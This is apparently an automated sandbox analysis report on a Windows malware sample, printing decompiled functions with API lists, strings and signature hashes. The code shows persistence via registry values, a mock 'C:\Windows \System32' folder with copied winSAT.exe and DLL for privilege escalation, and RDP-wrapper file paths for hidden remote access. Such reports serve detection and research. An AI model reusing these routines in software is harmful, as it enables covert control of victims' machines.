					RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1628,  &_v1608);
					RegSetValueExA(_v1628, "MaxConnectionsPer1_0Server", 0, 4,  &_v1616, 4);
					RegSetValueExA(_v1628, "MaxConnectionsPerServer", 0, 4,  &_v1616, 4);
					RegCloseKey(_v1628);
					E00405B4E( &_v1596, _t128, _t145);
					E00412A7F( &_v1508, _t128, _t145,  &_v1596);
					_t119 =  &_v592;
					E00405000( &_v592, _t128, _t145,  &_v1600,  &_v1512);
					E00401052( &_v1120, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1120);
					lstrcatW( &_v1140, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v1140, 0);
					if(_v1568 != 0 && E0041111B() != 1) {
						_t103 = E00410A3C();
						_t148 = _t103 - 0xa;
						if(_t103 != 0xa) {
							E00412F55(__eflags);
						} else {
							E0041313A(_t128, _t148);
						}
					}
					if(_v1552 != 0) {
						_t100 = E0041111B();
						_t150 = _t100 - 1;
						if(_t100 == 1) {
							E00414F7E(_t119, _t150);
						}
					}
					if(_v1548 != 0) {
						E0040F073();
					}
					_t152 = _v1492;
					if(_v1492 != 0) {
						L18:
						__eflags = _v1560;
						if(__eflags != 0) {
							E00413EBA();
						}
						E00404F74( &_v608, _t128, __eflags);
						goto L21;
					} else {
						E004126DC( &_v1528, _t152, _v1592, _v1584, _v1544);
						_t153 = _v1604;
						if(_v1604 == 0) {
							goto L18;
						}
						_v1624 = 0;
						_t123 =  &_v1632;
						E0040373F(_t123,  &_v1496);
						_push(_t123);
						E004120F8( &_v1624, _t153,  &_v1636,  &_v1628);
						E00405FEB(_v1648);
						E00405FEB(0);
						L21:
						E00404C8D( &_v608, _t129, _t153);
						goto L22;
					}
				}
			}







































                                  0x004154fb
                                  0x00415508
                                  0x0041550c
                                  0x00415518
                                  0x00415524
                                  0x00415529
                                  0x00415539
                                  0x00415543
                                  0x0041554e
                                  0x00415553
                                  0x00415559
                                  0x0041576e
                                  0x00415775
                                  0x0041577e
                                  0x0041578b
                                  0x0041555f
                                  0x00415563
                                  0x0041556f
                                  0x00415576
                                  0x0041557d
                                  0x00415582
                                  0x00415584
                                  0x00415584
                                  0x00415586
                                  0x00415587
                                  0x00415587
                                  0x00415594
                                  0x004155a6
                                  0x004155b6
                                  0x00000000
                                  0x00000000
                                  0x004155bc
                                  0x004155c2
                                  0x00000000
                                  0x00000000
                                  0x004155e5
                                  0x00415604
                                  0x00415619
                                  0x0041561f
                                  0x00415629
                                  0x0041563a
                                  0x0041564c
                                  0x00415653
                                  0x00415666
                                  0x0041567b
                                  0x0041568e
                                  0x0041569d
                                  0x004156a7
                                  0x004156b3
                                  0x004156b8
                                  0x004156bb
                                  0x004156c4
                                  0x004156bd
                                  0x004156bd
                                  0x004156bd
                                  0x004156bb
                                  0x004156cd
                                  0x004156cf
                                  0x004156d4
                                  0x004156d7
                                  0x004156d9
                                  0x004156d9
                                  0x004156d7
                                  0x004156e2
                                  0x004156e4
                                  0x004156e4
                                  0x004156e9
                                  0x004156f0
                                  0x0041574b
                                  0x0041574b
                                  0x0041574f
                                  0x00415751
                                  0x00415751
                                  0x0041575d
                                  0x00000000
                                  0x004156f2
                                  0x00415705
                                  0x0041570a
                                  0x0041570e
                                  0x00000000
                                  0x00000000
                                  0x00415717
                                  0x0041571c
                                  0x00415720
                                  0x00415725
                                  0x00415734
                                  0x0041573d
                                  0x00415744
                                  0x00415762
                                  0x00415769
                                  0x00000000
                                  0x00415769
                                  0x004156f0

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0041551D
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415539
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004155A0
                                  • GetLastError.KERNEL32 ref: 004155AB
                                  • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004155E5
                                  • RegSetValueExA.ADVAPI32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00415604
                                  • RegSetValueExA.ADVAPI32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00415619
                                  • RegCloseKey.ADVAPI32(?), ref: 0041561F
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041567B
                                  • lstrcatW.KERNEL32 ref: 0041568E
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0041569D
                                    • Part of subcall function 00412F55: CloseHandle.KERNEL32(?), ref: 00412F7F
                                    • Part of subcall function 00412F55: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                    • Part of subcall function 00412F55: GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                    • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                    • Part of subcall function 00412F55: lstrcatW.KERNEL32 ref: 00412FF7
                                    • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                    • Part of subcall function 00412F55: lstrcatW.KERNEL32 ref: 00413029
                                    • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                    • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                    • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                    • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                    • Part of subcall function 00412F55: RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                    • Part of subcall function 00412F55: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                    • Part of subcall function 00412F55: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                    • Part of subcall function 004126DC: CopyFileW.KERNEL32(?,?,00000000), ref: 0041277D
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 004120F8: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00412133
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  • MaxConnectionsPer1_0Server, xrefs: 004155FB
                                  • MaxConnectionsPerServer, xrefs: 00415610
                                  • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004155DB
                                  • \Microsoft Vision\, xrefs: 00415681
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Create$Directory$Close$CopyProcessValuelstrcat$HandleHeapModuleNameSystemWow64$AllocateCountCurrentDisableErrorEventFolderFreeLastPathReadRedirectionSizeTickVirtuallstrcpy
                                  • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                  • API String ID: 651455083-2552559493
                                  • Opcode ID: 2044e9e42bfc0140a5713c710f71f83a39e69364d515f229a4a0375c300a11a0
                                  • Instruction ID: 7326d773f6840a3835b81c51b4f2bde8360c666f101d5547bb5d37e447b5e8b5
                                  • Opcode Fuzzy Hash: 2044e9e42bfc0140a5713c710f71f83a39e69364d515f229a4a0375c300a11a0
                                  • Instruction Fuzzy Hash: 81614171408344EBD720EF61CC85EEF77B8EF94708F40492FB685921A1DB389985CB6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E5A3, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 121COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0040E5A3(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr* _t11;
				void* _t14;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t25;
				void* _t33;
				void* _t42;
				intOrPtr _t43;
				void* _t67;
				intOrPtr _t71;
				void* _t80;

				_t67 = __edx;
				_push(__ecx);
				_push(__ecx);
				InitializeCriticalSection(0x55ad18);
				_t71 = 5;
				asm("xorps xmm0, xmm0");
				 *0x55ad68 = _t71;
				 *0x55ad60 = _t71;
				_t42 = 0x18;
				asm("movups [0x55ad30], xmm0");
				 *0x55ad40 = 0;
				asm("movups [0x55ad48], xmm0");
				 *0x55ad58 = 0;
				 *0x55ad64 = 0;
				_t11 = E00406099(_t42);
				_t82 = _t11;
				if(_t11 == 0) {
					_t43 = 0;
				} else {
					 *_t11 = _t71;
					_t1 = _t11 + 4; // 0x4
					_t43 = _t1;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
				}
				 *0x55ad5c = _t43;
				 *0x55ad74 = 0;
				 *0x55ad78 = 0; // executed
				E00403411(0x55ad40, _t67, L"TermService"); // executed
				E00403411(0x55ad4c, _t67, L"%ProgramFiles%"); // executed
				_t14 = E004036F7( &_v12, L"%windir%\\System32"); // executed
				_t68 = _t14;
				_t15 = E004032E6( &_v8, _t14, _t82); // executed
				E00403549(0x55ad58, _t15); // executed
				E00405FEB(_v8);
				_v8 = 0;
				E00405FEB(_v12);
				_t19 = E00411177(_v12);
				_t83 = _t19 - 1;
				if(_t19 != 1) {
					_t69 = 0x55ad4c;
					_t20 = E004032E6( &_v12, 0x55ad4c, __eflags);
					_t80 = 0x55ad50;
					E00403549(0x55ad50, _t20);
					E00405FEB(_v12);
				} else {
					E00403411(0x55ad4c, _t68, L"%ProgramW6432%"); // executed
					_t69 = 0x55ad4c;
					_t33 = E004032E6( &_v12, 0x55ad4c, _t83); // executed
					_t80 = 0x55ad50;
					E00403549(0x55ad50, _t33); // executed
					E00405FEB(_v12);
					E00403411(0x55ad4c, 0x55ad4c, L"%ProgramFiles%"); // executed
				}
				E0040357C(_t80, _t69, _t83, L"\\Microsoft DN1"); // executed
				E0040357C(0x55ad4c, _t69, _t83, L"\\Microsoft DN1"); // executed
				_t25 = E0040357C(0x55ad58, _t69, _t83, L"\\rfxvmt.dll"); // executed
				E00410C3E(_t25, _t80);
				E00403549(0x55ad54, _t80); // executed
				E0040357C(0x55ad54, _t69, _t83, L"\\rdpwrap.ini"); // executed
				E0040357C(_t80, _t69, _t83, L"\\sqlmap.dll"); // executed
				E0040357C(0x55ad4c, _t69, _t83, L"\\sqlmap.dll"); // executed
				return 0x55ad18;
			}

















                                  0x0040e5a3
                                  0x0040e5a6
                                  0x0040e5a7
                                  0x0040e5b0
                                  0x0040e5b8
                                  0x0040e5b9
                                  0x0040e5bc
                                  0x0040e5c4
                                  0x0040e5cc
                                  0x0040e5cd
                                  0x0040e5d4
                                  0x0040e5da
                                  0x0040e5e1
                                  0x0040e5e7
                                  0x0040e5ed
                                  0x0040e5f2
                                  0x0040e5f4
                                  0x0040e606
                                  0x0040e5f6
                                  0x0040e5f6
                                  0x0040e5f8
                                  0x0040e5f8
                                  0x0040e5ff
                                  0x0040e600
                                  0x0040e601
                                  0x0040e602
                                  0x0040e603
                                  0x0040e603
                                  0x0040e608
                                  0x0040e618
                                  0x0040e61e
                                  0x0040e624
                                  0x0040e636
                                  0x0040e643
                                  0x0040e648
                                  0x0040e64d
                                  0x0040e658
                                  0x0040e660
                                  0x0040e668
                                  0x0040e66b
                                  0x0040e670
                                  0x0040e675
                                  0x0040e678
                                  0x0040e6af
                                  0x0040e6b4
                                  0x0040e6b9
                                  0x0040e6c1
                                  0x0040e6c9
                                  0x0040e67a
                                  0x0040e681
                                  0x0040e686
                                  0x0040e68b
                                  0x0040e690
                                  0x0040e698
                                  0x0040e6a0
                                  0x0040e6a8
                                  0x0040e6a8
                                  0x0040e6d6
                                  0x0040e6de
                                  0x0040e6ed
                                  0x0040e6f4
                                  0x0040e701
                                  0x0040e70d
                                  0x0040e71a
                                  0x0040e722
                                  0x0040e730

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(0055AD18), ref: 0040E5B0
                                    • Part of subcall function 00406099: GetProcessHeap.KERNEL32(00000000,000000F4,00411996,?,74A313FB,00000000,00405B72), ref: 0040609C
                                    • Part of subcall function 00406099: HeapAlloc.KERNEL32(00000000), ref: 004060A3
                                    • Part of subcall function 004032E6: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                  • String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll
                                  • API String ID: 2811233055-3289620323
                                  • Opcode ID: 3f53fd247fd4244b76578e31d1b2874747c49d3157bc9deecb40c1ef9b8c9a7c
                                  • Instruction ID: 6cb6bcb1a7122bfa5540acbacd22e5e8e3ff012f813de54f9fa316898c3517f8
                                  • Opcode Fuzzy Hash: 3f53fd247fd4244b76578e31d1b2874747c49d3157bc9deecb40c1ef9b8c9a7c
                                  • Instruction Fuzzy Hash: 7F319130B0061467C718BF669C628AE2E79ABD8707710063FB5027B2E2DE7C8E45975E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004148B6, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 138comCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E004148B6(intOrPtr __ecx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed short* _v36;
				char _v44;
				signed int* _t43;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t54;
				signed int _t57;
				char _t60;
				signed int _t61;
				intOrPtr* _t63;
				signed int _t64;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				signed int _t76;
				signed int _t85;
				signed int _t87;
				signed short* _t88;

				_t87 = 0;
				_v28 = __ecx;
				__imp__CoInitialize(0); // executed
				_t43 =  &_v12;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				__imp__CoCreateInstance(0x417600, 0, 1, 0x41a77c, _t43); // executed
				_t66 = _v12;
				if(_t66 != 0) {
					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x4175f0,  &_v8, 0);
					_t67 = _v8;
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
						_t64 = 0;
						while(1) {
							_t47 = _v8;
							_t34 =  &_v24; // 0x414222
							_v20 = _t87;
							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1, _t34,  &_v20);
							if(_t48 != 0) {
								break;
							}
							_t11 =  &_v24; // 0x414222
							_t50 =  *_t11 + _t64 * 4;
							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x417580,  &_v16);
							if(_t48 != 0) {
								break;
							}
							__imp__#8( &_v44);
							_t54 = _v16;
							_push(_t87);
							_push( &_v44);
							_push(L"Description");
							_push(_t54);
							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
								L6:
								_t73 = 0x1c;
								if(E00406099(_t73) == 0) {
									_t85 = _t87;
								} else {
									_t85 = E00414B6E(_t56);
								}
								_t88 = _v36;
								_t57 =  *_t88 & 0x0000ffff;
								if(_t57 == 0) {
									L12:
									 *(_t85 + 8) = _t64;
									E00402503(_v28 + 4, _t85);
									_t64 = _t64 + 1;
									_t87 = 0;
									continue;
								} else {
									_t76 = _t57;
									do {
										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
										_t60 =  *_t88;
										_t88 =  &(_t88[1]);
										 *((char*)(_t87 +  *_t85)) = _t60;
										_t87 = _t87 + 1;
										_t61 =  *_t88 & 0x0000ffff;
										_t76 = _t61;
									} while (_t61 != 0);
									goto L12;
								}
							}
							_t63 = _v16;
							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
							if(_t48 != 0) {
								break;
							}
							goto L6;
						}
						_t70 = _v8;
						if(_t70 != 0) {
							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
							_v8 = _t87;
						}
						_t71 = _v12;
						if(_t71 != 0) {
							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
							_v12 = _t87;
						}
						__imp__CoUninitialize();
						return _t48;
					}
				}
				return _t43;
			}






























                                  0x004148bf
                                  0x004148c1
                                  0x004148c5
                                  0x004148cb
                                  0x004148ce
                                  0x004148df
                                  0x004148e2
                                  0x004148e5
                                  0x004148eb
                                  0x004148f0
                                  0x00414903
                                  0x00414906
                                  0x0041490b
                                  0x00414914
                                  0x00414917
                                  0x004149c9
                                  0x004149c9
                                  0x004149d0
                                  0x004149d3
                                  0x004149dc
                                  0x004149e1
                                  0x00000000
                                  0x00000000
                                  0x0041491e
                                  0x0041492b
                                  0x00414932
                                  0x00414937
                                  0x00000000
                                  0x00000000
                                  0x00414941
                                  0x00414947
                                  0x0041494d
                                  0x0041494e
                                  0x0041494f
                                  0x00414956
                                  0x0041495c
                                  0x00414975
                                  0x00414977
                                  0x0041497f
                                  0x0041498c
                                  0x00414981
                                  0x00414988
                                  0x00414988
                                  0x0041498e
                                  0x00414991
                                  0x00414997
                                  0x004149b7
                                  0x004149bb
                                  0x004149c1
                                  0x004149c6
                                  0x004149c7
                                  0x00000000
                                  0x00414999
                                  0x00414999
                                  0x0041499b
                                  0x0041499e
                                  0x004149a4
                                  0x004149a6
                                  0x004149a9
                                  0x004149ac
                                  0x004149ad
                                  0x004149b0
                                  0x004149b2
                                  0x00000000
                                  0x0041499b
                                  0x00414997
                                  0x0041495e
                                  0x0041496e
                                  0x00414973
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00414973
                                  0x004149e7
                                  0x004149ec
                                  0x004149f1
                                  0x004149f4
                                  0x004149f4
                                  0x004149f7
                                  0x004149fc
                                  0x00414a01
                                  0x00414a04
                                  0x00414a04
                                  0x00414a07
                                  0x00000000
                                  0x00414a07
                                  0x0041490b
                                  0x00414a11

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004148C5
                                  • CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 004148E5
                                  • VariantInit.OLEAUT32(?), ref: 00414941
                                  • CoUninitialize.OLE32 ref: 00414A07
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInitInitializeInstanceUninitializeVariant
                                  • String ID: "BA$Description$FriendlyName
                                  • API String ID: 4142528535-3217936966
                                  • Opcode ID: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
                                  • Instruction ID: 897dfebaec31b784598ba9d9a56bb6e289364e2dbf67f6d0e24be1ac2d118ec5
                                  • Opcode Fuzzy Hash: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
                                  • Instruction Fuzzy Hash: 62413E74A00245AFCB14DFA5C888DEFBBB9EFC4714B14459EE441EB250DB78DA41CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405E28, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			_entry_() {
				struct _STARTUPINFOA _v72;
				intOrPtr _t6;
				int _t11;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr _t20;

				_t16 = GetCommandLineA();
				_t6 =  *_t16;
				if(_t6 != 0x22) {
					while(1) {
						__eflags = _t6 - 0x20;
						if(_t6 <= 0x20) {
							break;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						_t6 =  *_t16;
					}
					L12:
					if(_t6 != 0) {
						__eflags = _t6 - 0x20;
						if(_t6 > 0x20) {
							goto L13;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						L11:
						_t6 =  *_t16;
						goto L12;
					}
					L13:
					_t2 =  &(_v72.dwFlags);
					_v72.dwFlags = _v72.dwFlags & 0x00000000;
					GetStartupInfoA( &_v72);
					E00405EB6();
					E00405EE3(0x41c000, 0x41c030);
					GetModuleHandleA(0);
					_t11 = E004154EB( *_t2, 0x41c000, 0x41c000); // executed
					E00405ECB();
					ExitProcess(_t11);
				}
				_t18 = _t16 + 1;
				_t20 =  *_t18;
				if(_t20 == 0) {
					L5:
					_t1 = _t18 + 1; // 0x3
					_t14 =  !=  ? _t18 : _t1;
					_t16 =  !=  ? _t18 : _t1;
					goto L11;
				}
				_t15 = _t20;
				while(1) {
					_t20 = _t15;
					if(_t15 == 0x22) {
						goto L5;
					}
					_t18 = _t18 + 1;
					_t20 =  *_t18;
					_t15 = _t20;
					if(_t20 != 0) {
						continue;
					}
					goto L5;
				}
				goto L5;
			}










                                  0x00405e35
                                  0x00405e37
                                  0x00405e3b
                                  0x00405e65
                                  0x00405e65
                                  0x00405e67
                                  0x00000000
                                  0x00000000
                                  0x00405e62
                                  0x00405e62
                                  0x00405e63
                                  0x00405e63
                                  0x00405e72
                                  0x00405e74
                                  0x00405e6b
                                  0x00405e6d
                                  0x00000000
                                  0x00000000
                                  0x00405e6f
                                  0x00405e6f
                                  0x00405e70
                                  0x00405e70
                                  0x00000000
                                  0x00405e70
                                  0x00405e76
                                  0x00405e76
                                  0x00405e76
                                  0x00405e7e
                                  0x00405e84
                                  0x00405e93
                                  0x00405e9a
                                  0x00405ea2
                                  0x00405ea9
                                  0x00405eaf
                                  0x00405eaf
                                  0x00405e3d
                                  0x00405e3e
                                  0x00405e42
                                  0x00405e55
                                  0x00405e55
                                  0x00405e5b
                                  0x00405e5e
                                  0x00000000
                                  0x00405e5e
                                  0x00405e44
                                  0x00405e46
                                  0x00405e46
                                  0x00405e4a
                                  0x00000000
                                  0x00000000
                                  0x00405e4c
                                  0x00405e4d
                                  0x00405e4f
                                  0x00405e53
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405e53
                                  0x00000000

                                  APIs
                                  • GetCommandLineA.KERNEL32 ref: 00405E2F
                                  • GetStartupInfoA.KERNEL32 ref: 00405E7E
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00405E9A
                                  • ExitProcess.KERNEL32 ref: 00405EAF
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                  • String ID:
                                  • API String ID: 2164999147-0
                                  • Opcode ID: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                  • Instruction ID: 79012c7e925f986a536a85d8df8cd7193993c2d42f70a77d9956ba037c84b5bc
                                  • Opcode Fuzzy Hash: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                  • Instruction Fuzzy Hash: DE010434108A444ED7206B74D8863EB3FA6DB1A348B68107EE1C5A7382C63E0E478EDD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004134A2, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E004134A2(CHAR* __ecx, signed int* __edx) {
				long _v8;
				void* _t5;
				long _t6;
				signed int _t7;
				void* _t11;
				signed int* _t18;
				void* _t22;

				_push(__ecx);
				_t18 = __edx;
				_t11 = E00401085(0x400000);
				_v8 = 0;
				_t5 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0); // executed
				_t22 = _t5;
				if(_t22 == 0xffffffff) {
					 *_t18 =  *_t18 & 0x00000000;
				}
				_t6 = GetFileSize(_t22, 0);
				 *_t18 = _t6;
				_t7 = ReadFile(_t22, _t11, _t6,  &_v8, 0); // executed
				if(_t7 == 0) {
					 *_t18 =  *_t18 & _t7;
				}
				CloseHandle(_t22); // executed
				return _t11;
			}










                                  0x004134a5
                                  0x004134ae
                                  0x004134b8
                                  0x004134cc
                                  0x004134cf
                                  0x004134d5
                                  0x004134da
                                  0x004134dc
                                  0x004134dc
                                  0x004134e2
                                  0x004134ed
                                  0x004134f3
                                  0x004134fb
                                  0x004134fd
                                  0x004134fd
                                  0x00413500
                                  0x0041350c

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                  • CloseHandle.KERNEL32(00000000), ref: 00413500
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                  • String ID:
                                  • API String ID: 2517252058-0
                                  • Opcode ID: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                  • Instruction ID: aa115e6f790b4d38b1fbeae35b29bc5e12f96e584a277f2799dc653a56db372b
                                  • Opcode Fuzzy Hash: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                  • Instruction Fuzzy Hash: E1F0AFB2605210BFE3215B35AC09FFB76ACDB54725F204135FA41E62C0EBB45E0086A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403447(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
				void* _t4;
				WCHAR* _t6;
				WCHAR** _t8;
				WCHAR** _t14;

				_t14 = _a4;
				_t8 = __ecx;
				_t4 = E00403373(_t14);
				_t6 = E00405F8C( *((intOrPtr*)(__ecx)), 4 + (_t4 + E00403373(__ecx)) * 2); // executed
				 *_t8 = _t6;
				return lstrcatW(_t6,  *_t14);
			}







                                  0x0040344d
                                  0x00403450
                                  0x00403454
                                  0x0040346d
                                  0x00403472
                                  0x00403481

                                  APIs
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • lstrcatW.KERNEL32 ref: 00403477
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrlen
                                  • String ID: ?VA
                                  • API String ID: 1475610065-1028452459
                                  • Opcode ID: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                  • Instruction ID: 49b9b30c5e13f085cb611e028f6c6d6892849633b3b038c637a710d95911752b
                                  • Opcode Fuzzy Hash: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                  • Instruction Fuzzy Hash: 02E0D8327042105BCB106B66D8C496E7B5DEF853A0704043AF90597250DE785C0096E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041338D, Relevance: 3.0, APIs: 2, Instructions: 14sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041338D(signed int _a4) {

				Sleep(1); // executed
				return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
			}



                                  0x00413392
                                  0x004133b5

                                  APIs
                                  Memory Dump Source
